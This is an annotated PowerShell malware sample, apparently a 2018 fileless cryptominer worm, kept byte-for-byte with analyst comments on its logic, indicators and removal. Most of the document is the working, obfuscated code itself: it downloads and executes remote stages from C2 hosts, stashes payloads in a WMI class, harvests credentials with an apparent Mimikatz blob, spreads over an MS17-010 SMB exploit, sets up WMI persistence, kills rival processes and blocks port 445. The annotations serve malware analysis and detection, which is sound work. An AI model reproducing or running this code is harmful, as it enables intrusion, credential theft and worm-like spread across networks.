# ---------------------------------------------------------------------------
# MALWARE SAMPLE - analyst annotations only; the code is deliberately left
# byte-for-byte as found. This is a PowerShell dropper/worm stage that
#   (a) picks a reachable C2 host,
#   (b) on 64-bit hosts fetches and runs a further stage over plain HTTP, and
#   (c) otherwise stores base64 payload blobs in a custom WMI class, installs
#       a WMI event-subscription for persistence, and tries to spread via
#       harvested credentials and an MS17-010 style SMB exploit.
# Cmdlet names are split with backticks (teSt-`Co`NNec`TIoN) and strings are
# built by concatenation so that static signatures do not match. PowerShell
# treats a backtick before an ordinary letter as that letter and cmdlet names
# are case-insensitive, so this is cosmetic obfuscation only - read through it.
# NOTE(review): the trailing "| |" on every line is an artefact of the page
# extraction, not part of the script.
# ---------------------------------------------------------------------------
# C2 candidates (IOCs as of the gist date, June 2018): two hostnames under
# windowsdefenderhost.club plus a raw IP; the www. hostname is the fallback.
$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215')) | |
$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub') | |
# First candidate that answers an ICMP echo wins (Test-Connection returns
# nothing for a host that never replies, so $pin stays $null).
foreach($t in $se) | |
{ | |
$pin=teSt-`Co`NNec`TIoN $t | |
if ($pin -ne $null) | |
{ | |
$nic=$t | |
break | |
} | |
} | |
# All C2 traffic is plain HTTP on tcp/8000 - an easy network IOC.
$nic=$nic+(':80'+'00') | |
# 64-bit hosts: download-and-eval a separate stage (info6.ps1) and stop here;
# everything below this block is the path taken on non-64-bit hosts (or when
# the WMI architecture query fails).
if ((GeT`-wmI`oBJEcT Win32_OperatingSystem).osarchitecture.contains('64')) | |
{ | |
I`Ex(n`Ew`-ObJEct Net.WebClient).DownloadString("http://$nic/info6.ps1") | |
return | |
} | |
# reload: undoes a simple anti-signature transform on the payload string $a.
# The string is viewed as 1000-character chunks; the full chunks are emitted in
# reverse order (last full chunk first, chunk 0 last) and the short tail
# (length % 1000 characters, possibly empty) is appended unchanged. The server
# therefore ships the blob with its full chunks reversed so that no contiguous
# run of a known payload appears on the wire. A string shorter than 1000
# characters passes through untouched.
# Param $a: the raw payload string as downloaded. Returns the reordered string.
function reload ($a){ | |
$b="" | |
$size=[Math]::Floor($a.length/1000) | |
for($i=$size-1;$i -ge 0;$i--) | |
{ | |
$b+=$a.Substring($i*1000,1000) | |
} | |
# Remaining partial chunk (if any) keeps its position at the end.
$b+=$a.Substring($size*1000) | |
return $b | |
} | |
# $fa is not assigned anywhere in this excerpt - presumably the server-side
# stage prepends a large `$fa="<blob>"` assignment (about 2.04 M characters,
# judging from the offsets below) that the gist omits. After un-shuffling, four
# fixed-offset slices are cut out; the 6-, 1- and 17-character gaps between
# them look like separators. What each slice is used for elsewhere in this file:
#   $mimi - 944812 chars; passed to Get-creds (defined in $funs). The name
#           suggests a Mimikatz build - confirm by decoding, not assumed here.
#   $mon  - 570712 chars; handed to $RemoteScriptBlock with ('Void', 0, '', '').
#           That argument shape resembles a reflective PE loader and "mon" is
#           presumably the miner - confirm.
#   $funs - 519596 chars; base64 of PowerShell source that is IEX'd to define
#           Get-NetworkRange, Get-creds, test-ip, KillBot, eb7, eb8 and the
#           [PingCastle.Scanners.m17sc] type used later.
#   $sc   - 3264 chars; base64-decoded to [byte[]] and passed to eb7/eb8, i.e.
#           shellcode for the SMB exploit path.
# All four stay strings so they can be written into WMI class properties.
$fa=r`elOAD $fa | |
$mimi = $fa.SubString(0, 944812) | |
$mon = $fa.SubString(944818, 570712) | |
$funs = $fa.SubString(1515531, 519596) | |
$sc = $fa.SubString(2035144, 3264) | |
# Fileless payload storage. Creates a static WMI class root\default:coredpussvr
# (namespace string assembled from 'root' + [char]92 + 'default') and writes
# the four payload blobs plus three bookkeeping properties into it, calling
# Put() after every Add(). The embedded $Script later reads them back with
# [WmiClass] 'root\default:coredpussvr'. Bookkeeping properties:
#   ipsu - space-separated hosts already taken over with credentials
#   i17  - hosts already hit through the MS17-010 path
#   ver  - '1.4', compared against http://$nic/ver.txt for self-update
# IOC / hunting: a class named coredpussvr under root\default whose string
# properties are hundreds of KB long, e.g.
#   Get-WmiObject -Namespace root\default -List | Where-Object Name -eq 'coredpussvr'
try{ | |
$StaticClass = NEw-O`B`jECT Management.ManagementClass((('root'+'{0}def'+'aul'+'t') -f[CHAr]92), $null,$null) | |
$StaticClass.Name = ('co'+'red'+'pussvr') | |
$StaticClass.Put() | oUt`-NUll | |
$StaticClass.Properties.Add(('mi'+'mi') , $mimi) | |
$StaticClass.Put() | oU`T-nUll | |
$StaticClass.Properties.Add(('m'+'on') , $mon) | |
$StaticClass.Put() | out`-N`ULl | |
$StaticClass.Properties.Add(('fu'+'ns') , $funs) | |
$StaticClass.Put() | Out`-nu`LL | |
$StaticClass.Properties.Add('sc' , $sc) | |
$StaticClass.Put() | out`-NULL | |
$StaticClass.Properties.Add(('i'+'psu') ," ") | |
$StaticClass.Put() | OU`T-`NuLL | |
$StaticClass.Properties.Add(('i'+'17') ," ") | |
$StaticClass.Put() | O`UT-`NuLl | |
$StaticClass.Properties.Add(('v'+'er'), ('1'+'.4')) | |
$StaticClass.Put() | out`-NuLl | |
# Catch path: taken when creating/committing the class throws - presumably
# because it already exists from an earlier run (hedged). Rather than storing
# anything it goes straight to spreading, and only via the SMB exploit path
# (no credential reuse in this branch).
} catch { | |
# Decode the helper library and bring its functions/types into scope.
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)) | |
I`Ex $defun | |
$Networks = GET-`Wm`iOb`Ject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled} | |
$sc=[System.Convert]::FromBase64String($sc) | |
foreach ($Network in $Networks) | |
{ | |
$IPAddress = $Network.IpAddress[0] | |
# Skip APIPA/link-local adapters (the '.' is unescaped but harmless here).
if ($IPAddress -match ('^1'+'69.254')){continue} | |
$SubnetMask = $Network.IPSubnet[0] | |
# Get-NetworkRange comes from $funs; it expands the local subnet into targets.
$ips=ge`T`-nETwoRKr`ANGe $IPAddress $SubnetMask | |
# Add every established TCP peer as a target. With `netstat -anop tcp` and
# empty fields dropped, [-3] is the foreign address, [-2] the state and [-1]
# the owning PID; header lines have <= 4 fields and are skipped.
$tcpconn = N`E`TsTat -anop tcp | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if (!($line -is [array])){continue} | |
if ($line.count -le 4){continue} | |
$i=$line[-3].split(':')[0] | |
if ( ($line[-2] -eq ('ESTA'+'BL'+'ISHED')) -and ($i -ne ('1'+'2'+'7.0.0.1')) -and ($ips -notcontains $i)) | |
{ | |
$ips+=$i | |
} | |
} | |
# 5400 s (90 min) run budget. NOTE(review): $stime is never assigned in this
# outer script (only inside the embedded $Script), so here the expression is
# TickCount minus $null, i.e. raw uptime: on a machine up for more than 90
# minutes these loops appear to bail out immediately. Looks like a bug in the
# sample; left as-is on purpose.
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
foreach ($ip in $ips) | |
{ | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
if ($ip -eq $IPAddress){continue} | |
# $ipsu is also unset in this branch, so -notcontains is always true.
if ((TEST`-c`O`NNect`ioN $ip -count 1) -ne $null -and $ipsu -notcontains $ip) | |
{ | |
# Type defined in $funs; the name suggests PingCastle's MS17-010 checker,
# returning truthy for a vulnerable host - confirm from the decoded source.
$vul=[PingCastle.Scanners.m17sc]::Scan($ip) | |
if ($vul -and $i17 -notcontains $ip) | |
{ | |
# eb7 then eb8 with the shellcode bytes: presumably two exploit variants
# (e.g. per OS build) - confirm from $funs. Hits are noted in $i17 but this
# branch never writes $i17 back to the WMI class.
$res=E`B7 $ip $sc | |
if (!($res -eq $true)) | |
{e`B8 $ip $sc} | |
$i17 = $i17 + " "+$ip | |
} | |
} | |
} | |
} | |
} | |
# Names of the WMI persistence objects created below - both are IOCs
# (they are chosen to look like a benign event-log subscription).
$filterName = ('S'+'ystem Ev'+'ents '+'L'+'og F'+'ilter') | |
$consumerName = ('S'+'y'+'st'+'em Eve'+'nts Log '+'Consumer') | |
# Persistence payload. This here-string is the exact script that the WMI
# CommandLineEventConsumer installed further down runs (UTF-16LE + base64 via
# `powershell.exe -NoP -NonI -W Hidden -E ...`) every time the timer-style
# __InstanceModificationEvent fires, and that `iex $script` at the end of this
# file runs once immediately. It is the same logic as the obfuscated outer
# script but in clear text, so it is the better reference for analysts.
# NOTE(review): no comments can be added inside the here-string - its bytes are
# the program (they are encoded and executed) - so the walkthrough lives here:
#  1. C2 selection: same three hosts, ICMP check and port 8000 as the outer
#     script.
#  2. Self-update: GET http://$nic/ver.txt; if it differs from the 'ver'
#     property of root\default:coredpussvr, download + IEX info3.ps1 and stop.
#  3. $stime = TickCount starts the 5400 s (90 min) budget used by the
#     spreading loops.
#  4. Decode and IEX the 'funs' property (helper definitions).
#  5. Remove every __FilterToConsumerBinding in root\subscription whose filter
#     name does not match 'System Events Log' - evicts competing WMI
#     persistence, including legitimate subscriptions.
#  6. $psids = powershell PIDs sorted by CPU; $exist becomes $true when the
#     busiest one holds an ESTABLISHED connection on :80 or :14444
#     (presumably the already-running miner - confirm).
#  7. KillBot('coredpussvr') (from funs), then force-kill any process with an
#     ESTABLISHED connection to a remote port in 1111..9999, 14433, 45560,
#     65333 or 55335 - reads like a list of rival miner/pool ports (hedged).
#  8. If no miner is detected and at most 8 powershell processes exist, start a
#     hidden powershell (WScript.Shell.Run(..., 0)) that pulls 'mon' and 'funs'
#     from the WMI class and runs
#     Invoke-Command $RemoteScriptBlock -ArgumentList ($mon,$mon,'Void',0,'','')
#     - the argument shape of a reflective PE loader; confirm from funs.
#  9. Get-creds $mimi $mimi -> ($a, $NTLM): credential harvesting with the
#     'mimi' blob (Mimikatz is the obvious reading - confirm).
# 10. For every IP-enabled adapter (skipping 169.254.*): expand the subnet with
#     Get-NetworkRange, add established netstat peers, and for each live host
#     not already in 'ipsu' try test-ip with the harvested creds (-nic $nic
#     suggests the victim is pointed at the same C2); on failure fall back to
#     [PingCastle.Scanners.m17sc]::Scan and eb7/eb8 with the 'sc' shellcode,
#     recording hits in 'i17'.
# 11. Write 'ipsu' and 'i17' back into the WMI class so the next run skips them.
# Detection: powershell.exe -NoP -NonI -W Hidden -E launched from WmiPrvSE.exe
# (typical parent for CommandLineEventConsumer), reads of
# root\default:coredpussvr, `netstat -anop tcp` spawned by PowerShell, and
# outbound HTTP to tcp/8000 on the hosts above.
$Script=@' | |
$se=@('update.windowsdefenderhost.club','info.windowsdefenderhost.club','87.121.98.215') | |
$nic='www.windowsdefenderhost.club' | |
foreach($t in $se) | |
{ | |
$pin=test-connection $t | |
if ($pin -ne $null) | |
{ | |
$nic=$t | |
break | |
} | |
} | |
$nic=$nic+":8000" | |
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim() | |
if($ver -ne $null){ | |
if($ver -ne ([WmiClass] 'root\default:coredpussvr').Properties['ver'].Value){ | |
IEX (New-Object Net.WebClient).DownloadString("http://$nic/info3.ps1") | |
return | |
} | |
} | |
$stime=[Environment]::TickCount | |
$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value | |
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)) | |
iex $defun | |
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'System Events Log'} |Remove-WmiObject | |
[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id} | |
$tcpconn = netstat -anop tcp | |
$exist=$False | |
if ($psids -ne $null ) | |
{ | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if ($line -eq $null) | |
{continue} | |
if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) ) | |
{ | |
$exist=$true | |
break | |
} | |
} | |
} | |
KillBot('coredpussvr') | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if (!($line -is [array])){continue} | |
if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":14433") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335"))) | |
{ | |
$evid=$line[-1] | |
Get-Process -id $evid | stop-process -force | |
} | |
} | |
if (!$exist -and ($psids.count -le 8)) | |
{ | |
$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`"" | |
$vbs = New-Object -ComObject WScript.Shell | |
$vbs.run($cmdmon,0) | |
} | |
$NTLM=$False | |
$mimi = ([WmiClass] 'root\default:coredpussvr').Properties['mimi'].Value | |
$a, $NTLM= Get-creds $mimi $mimi | |
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled} | |
$ipsu = ([WmiClass] 'root\default:coredpussvr').Properties['ipsu'].Value | |
$i17 = ([WmiClass] 'root\default:coredpussvr').Properties['i17'].Value | |
$scba= ([WmiClass] 'root\default:coredpussvr').Properties['sc'].Value | |
[byte[]]$sc=[System.Convert]::FromBase64String($scba) | |
foreach ($Network in $Networks) | |
{ | |
$IPAddress = $Network.IpAddress[0] | |
if ($IPAddress -match '^169.254'){continue} | |
$SubnetMask = $Network.IPSubnet[0] | |
$ips=Get-NetworkRange $IPAddress $SubnetMask | |
$tcpconn = netstat -anop tcp | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if (!($line -is [array])){continue} | |
if ($line.count -le 4){continue} | |
$i=$line[-3].split(':')[0] | |
if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i)) | |
{ | |
$ips+=$i | |
} | |
} | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
foreach ($ip in $ips) | |
{ | |
if (([Environment]::TickCount-$stime)/1000 -gt 5400){break} | |
if ($ip -eq $IPAddress){continue} | |
if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip) | |
{ | |
$re=0 | |
if ($a.count -ne 0) | |
{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM } | |
if ($re -eq 1){$ipsu =$ipsu +" "+$ip} | |
else | |
{ | |
$vul=[PingCastle.Scanners.m17sc]::Scan($ip) | |
if ($vul -and $i17 -notcontains $ip) | |
{ | |
$res=eb7 $ip $sc | |
if (!($res -eq $true)) | |
{eb8 $ip $sc} | |
$i17 = $i17 + " "+$ip | |
} | |
} | |
} | |
} | |
} | |
$StaticClass=New-Object Management.ManagementClass('root\default:coredpussvr') | |
$StaticClass.SetPropertyValue('ipsu' ,$ipsu) | |
$StaticClass.Put() | |
$StaticClass.SetPropertyValue('i17' ,$i17) | |
$StaticClass.Put() | |
'@ | |
# Encode the embedded script the way `powershell -E` expects: UTF-16LE bytes,
# then base64. To recover it from a captured command line:
#   [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))
$Scriptbytes = [System.Text.Encoding]::Unicode.GetBytes($Script) | |
$EncodedScript=[System.Convert]::ToBase64String($Scriptbytes) | |
# WQL trigger, de-obfuscated ('tMr' is replaced by [char]39, a single quote):
#   SELECT * FROM __InstanceModificationEvent WITHIN 5600
#   WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
# Polling a perf counter class that always changes turns this into a timer
# that fires roughly every 5600 s (~93 min).
$Query = (('SELECT * FROM __Insta'+'nceModif'+'icat'+'ionE'+'vent WITH'+'IN 56'+'00'+' WHERE'+' T'+'arge'+'tInstance I'+'S'+'A tMrWin32_Perf'+'F'+'o'+'rma'+'ttedDa'+'ta_Perf'+'OS_Syst'+'em'+'tMr') -REplACE 'tMr',[chAr]39) | |
# Tear down any previous binding/filter/consumer with the same names before
# re-creating them (clean reinstall on re-infection or update). The '{0}' and
# '9MQ' placeholders are again just single quotes.
gE`T-`w`MiObjecT -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter (('__P'+'a'+'t'+'h LI'+'KE '+'{0}%System Events'+' L'+'og Consu'+'mer%{0}') -f[ChAR]39) | reM`OVE`-w`mIoBjE`CT | |
Get`-wMiObje`cT -Namespace root\Subscription -Class __EventFilter -filter (('name= 9MQSy'+'ste'+'m '+'Even'+'ts'+' L'+'og F'+'ilter9'+'MQ')-cREplacE ([ChAR]57+[ChAR]77+[ChAR]81),[ChAR]39) |REMOV`E-w`m`IobjE`CT | |
GE`T-`wm`iO`BJeCt -Namespace root\Subscription -Class CommandLineEventConsumer -Filter (('Name'+'={0'+'}System Eve'+'nt'+'s Log Consumer'+'{0}') -F [char]39) | r`eMoVE-WMiOb`jECT | |
# Close the door behind itself: a legacy `netsh ipsec static` policy named
# "netbc" with filter list "block" that drops inbound TCP to this host on
# port 445 from any source. The likely motive (inferred) is to keep rival
# SMB worms from re-exploiting the same MS17-010 hole; the side effect is
# that file sharing and remote admin over SMB to this host silently break.
# Hunt with `netsh ipsec static show all`; remediate by un-assigning and
# deleting the "netbc" policy (assign=n, then delete policy/filterlist).
nE`Tsh ipsec static add policy name=netbc | |
N`eTSh ipsec static add filterlist name=block | |
ne`Tsh ipsec static add filteraction name=block action=block | |
n`eTsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445 | |
n`eTSh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block | |
Net`SH ipsec static set policy name=netbc assign=y | |
# WMI event-subscription persistence (filter + consumer + binding) in
# root\subscription. The namespace strings are obfuscated: '5Gi' and '{0}' and
# 'RB2' are all replaced by [char]92, a backslash.
# Detection: Sysmon Event IDs 19/20/21 (WmiEventFilter / WmiEventConsumer /
# WmiEventConsumerToFilter) or Microsoft-Windows-WMI-Activity/Operational
# event 5861; hunt with Get-WmiObject -Namespace root\subscription for the
# classes __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding
# and remove the three objects with Remove-WmiObject, then delete the payload
# class via ([WmiClass]'root\default:coredpussvr').Delete().
$FilterParams = @{ | |
Namespace = (('ro'+'ot5Gis'+'ubscr'+'ipti'+'on') -cREPlAce ([chAR]53+[chAR]71+[chAR]105),[chAR]92) | |
Class = ('__Ev'+'entF'+'ilter') | |
# EventNameSpace root\cimv2 because the WQL query watches a perf-counter class there.
Arguments =@{Name=$filterName;EventNameSpace=(('r'+'oot{0}cimv2') -f[CHaR]92);QueryLanguage=('WQ'+'L');Query=$Query} | |
ErrorAction = ('Silently'+'Continu'+'e') | |
} | |
$WMIEventFilter = Set-`WmIINs`Ta`NcE @FilterParams | |
$ConsumerParams = @{ | |
Namespace = (('root{'+'0}'+'subscription')-f[ChaR]92) | |
Class = ('Comm'+'andLi'+'neEventConsu'+'m'+'er') | |
# The command the consumer runs on every trigger: a hidden, non-interactive,
# no-profile powershell executing the base64 UTF-16 copy of $Script.
Arguments =@{ Name = $consumerName; CommandLineTemplate=('p'+'o'+'wershell.e'+'xe -NoP'+' -N'+'o'+'n'+'I'+' -W Hidde'+'n -E ')+"$EncodedScript"} | |
ErrorAction = ('S'+'ilentlyC'+'onti'+'nue') | |
} | |
$WMIEventConsumer = s`et-Wm`i`InsTANce @ConsumerParams | |
# Binding ties the timer filter to the command consumer - this is the line
# that actually arms the persistence.
SeT`-WMI`In`ST`Ance -Class __FilterToConsumerBinding -Namespace (('root'+'RB2su'+'bscri'+'pti'+'on').REPLaCE('RB2',[STRinG][CHaR]92)) -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} | OU`T`-NUll | |
# Housekeeping from what is presumably an earlier variant (hedged): drop a
# scheduled task named "yastcat" and delete %SystemRoot%\temp\y1.bat (both
# path expressions below build the same "\temp\y1.bat" via [char]92).
# Both names are IOCs worth checking for on the host.
Sc`hTaSKS /delete /tn yastcat /f | |
if (TEs`T-p`ATH ($env:SystemRoot+(('WXUt'+'empW'+'XUy1'+'.'+'b'+'at').rEpLace('WXU',[sTRiNG][cHaR]92)))){R`emO`V`e-ItEM -Path ($env:SystemRoot+(('T'+'Hl'+'tempTHly'+'1.bat').REpLacE('THl',[StrInG][chAr]92))) -Force} | |
# Keep the machine awake: never standby/hibernate on AC power, and set a
# power-scheme value to 0. The GUIDs appear to be the Balanced scheme, the
# "Power buttons and lid" subgroup and "Lid close action" (0 = do nothing) -
# verify with `powercfg /q`. Motive (inferred) is uninterrupted payload runtime.
po`w`ErCFG /CHANGE -standby-timeout-ac 0 | |
P`OwERCFG /CHANGE -hibernate-timeout-ac 0 | |
pO`we`RCfG -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 | |
# Kill the busiest existing powershell.exe if it has an ESTABLISHED TCP
# connection involving port 80 or 14444 - presumably a previously running
# instance of the payload (the embedded $Script uses the same ports to decide
# whether its miner is alive), so the freshly installed copy takes over. With
# `netstat -anop tcp` and empty fields dropped, $line[-1] is the owning PID.
[array]$psids= g`E`T-PROc`eSS -name powershell |sO`Rt cpu -Descending| FOreAC`H-`Obj`Ect {$_.id} | |
$tcpconn = NE`Tst`At -anop tcp | |
if ($psids -ne $null ) | |
{ | |
foreach ($t in $tcpconn) | |
{ | |
$line =$t.split(' ')| ?{$_} | |
if ($line -eq $null) | |
{continue} | |
# ':80 ' (with the trailing space) matches either the local or the foreign
# column ending in port 80; ':14444' is a plain substring match.
if (($psids[0] -eq $line[-1]) -and $t.contains(('ES'+'T'+'ABLI'+'SHED')) -and ($t.contains((':8'+'0 ')) -or $t.contains((':'+'14444'))) ) | |
{ | |
geT`-p`ROcESs -id $psids[0] | stop-P`Roc`ESs -force | |
break | |
} | |
} | |
} | |
# Run the embedded persistence script once right now rather than waiting up to
# ~93 minutes for the first WMI timer event.
i`ex $script